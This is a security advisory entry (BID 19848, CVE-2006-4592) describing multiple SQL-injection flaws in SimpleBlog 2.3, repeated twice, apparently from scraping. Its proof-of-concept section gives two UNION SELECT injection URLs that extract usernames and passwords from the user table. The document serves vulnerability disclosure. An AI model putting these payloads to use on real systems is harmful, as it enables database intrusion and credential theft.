8Pixel.net SimpleBlog ID Parameter Multiple SQL Injection Vulnerabilities
BID:19848
CVE-2006-4592 |Info
8Pixel.net SimpleBlog ID Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 19848 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 05 2006 12:00AM |
| Updated: | Nov 27 2006 03:35PM |
| Credit: | Vipsta and MurderSkillz are credited with the discovery of this vulnerability. |
| Vulnerable: |
8pixel.net Simple Blog 2.3 |
| Not Vulnerable: | |
Discussion
8Pixel.net SimpleBlog ID Parameter Multiple SQL Injection Vulnerabilities
SimpleBlog is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
SimpleBlog 2.3 is vulnerable to these issues; other versions may also be affected.
SimpleBlog is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
SimpleBlog 2.3 is vulnerable to these issues; other versions may also be affected.
Exploit / POC
8Pixel.net SimpleBlog ID Parameter Multiple SQL Injection Vulnerabilities
Attackers can exploit this issue via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USE
http://www.example.com/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
Attackers can exploit this issue via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USE
http://www.example.com/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
Solution / Fix
8Pixel.net SimpleBlog ID Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
8Pixel.net SimpleBlog ID Parameter Multiple SQL Injection Vulnerabilities
References:
References:
- SimpleBlog Web Site (8pixel.net)